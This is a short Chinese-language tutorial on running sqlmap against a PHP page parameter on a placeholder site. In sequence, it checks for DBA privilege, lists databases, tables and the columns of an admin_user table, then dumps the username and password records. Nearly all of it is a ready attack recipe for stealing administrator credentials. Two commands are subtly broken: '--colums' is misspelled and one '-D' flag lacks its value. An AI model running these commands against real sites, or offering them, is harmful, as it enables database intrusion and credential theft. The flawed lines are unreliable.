002.sqlmap注入php程序

目标网站：http://www.example.com/news.php?id=110

sqlmap -u "http://www.example.com/news.php?id=110" 

查询是否可获取管理员权限

sqlmap -u "http://www.example.com/news.php?id=110"  --is-dba

返回back-end DBMS: MySQL >= 5.0.0

列出所有数据库

 sqlmap -u "http://www.example.com/news.php?id=110"  --dbs

查找当前的数据库

 sqlmap -u "http://www.example.com/news.php?id=110" --current-db

返回当前的数据库为db

查询db数据库所有表名

 sqlmap -u "http://www.example.com/news.php?id=110" --tables -D "db"

查询admin_user表中所有的字段

 sqlmap -u "http://www.example.com/news.php?id=110" --colums -T "admin_user" -D 

查询db数据库admin_user表中username和password字段的所有记录并下载

 sqlmap -u "http://www.example.com/news.php?id=110" --dump -C "username，password" -T "admin_user" -D "db"